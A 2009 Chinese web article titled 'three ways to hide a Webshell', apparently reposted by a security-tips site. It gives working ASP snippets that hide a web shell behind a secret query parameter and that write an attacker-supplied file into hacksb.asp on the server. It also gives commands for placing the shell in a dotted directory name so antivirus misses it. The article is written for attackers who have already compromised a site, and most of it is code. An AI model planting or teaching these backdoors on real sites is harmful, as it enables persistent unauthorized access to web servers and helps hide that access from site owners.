ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心安全防范三种隐藏Webshell的方法
站内搜索:

三种隐藏Webshell的方法


2009/8/21  编辑:佚名 来源:本站整理 

作者:普瑞斯特
第一种:
在我们要做手脚的asp文件里加入如下内容
<%if request("action")="ok" then%>
shell代码插在这里
<%end if%>
访问的时候在你作手脚的asp文件后面加上?action=ok,即可

第二种:
在我们要做手脚的asp文件里加入如下内容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("hacksb.asp"),2
%>
访问的时候在做手脚的asp文件后面加上?filer=xxx,
xxx为你本地上传的一个路径如C:\hacksb.asp,
上传后在做手脚的asp的同文件夹中会自动生成hacksb.asp

参考消息:http://www.arpun.com/第三种:
前提得到system权限,
进入网站目录下一层
mkdir s…
copy hacksb.asp s…/
这样杀毒软件找不到的
访问http://网站/s…/hacksb.asp即可

更多精彩,请查看本类栏目: 安全防范
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/4347.html

相关文章
  • ·[图文]苹果手机屏蔽骚扰短信的三种方法
  • ·[图文]三种辨别iphone6s真伪的详细方式
  • ·[图文]三种删除launchpad软件的方法
  • ·[图文]iPhone微信小视频保存到本地的三种方法
  • ·机甲通过升级会获得哪三种技能?
  • ·病毒造成电脑蓝屏的三种攻击方式
  • ·[图文]无线路由器的三种加密方式
  • ·[图文]三种方法解决关闭xp自动更新工具的问题
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图